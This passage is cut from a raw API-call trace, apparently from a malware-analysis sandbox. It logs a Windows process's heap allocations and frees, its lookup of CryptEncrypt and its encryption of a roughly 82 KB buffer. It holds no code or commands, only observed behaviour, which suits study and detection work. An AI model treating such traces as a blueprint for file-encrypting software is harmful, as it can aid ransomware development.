Flags=0x0, Size=0x4) returned 0x2e54da8 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0152.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ba8 [0152.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.909] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0152.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54120 [0152.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0152.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0152.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0152.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0152.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0152.910] CryptEncrypt (in: hKey=0xa870d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e944c8*, pdwDataLen=0x8cef60*=0x14189, dwBufLen=0x14190 | out: pbData=0x2e944c8*, pdwDataLen=0x8cef60*=0x14190) returned 1 [0152.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0152.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0152.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0152.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0152.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0152.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0152.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0152.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0152.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0152.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0152.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0152.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0152.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0152.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0152.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0152.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0152.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0152.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0152.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0152.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0152.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0152.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0152.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0152.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14190) returned 0x2ea8660 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0152.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14190) returned 0x2ebc7f8 [0152.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8660 | out: hHeap=0x970000) returned 1 [0152.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 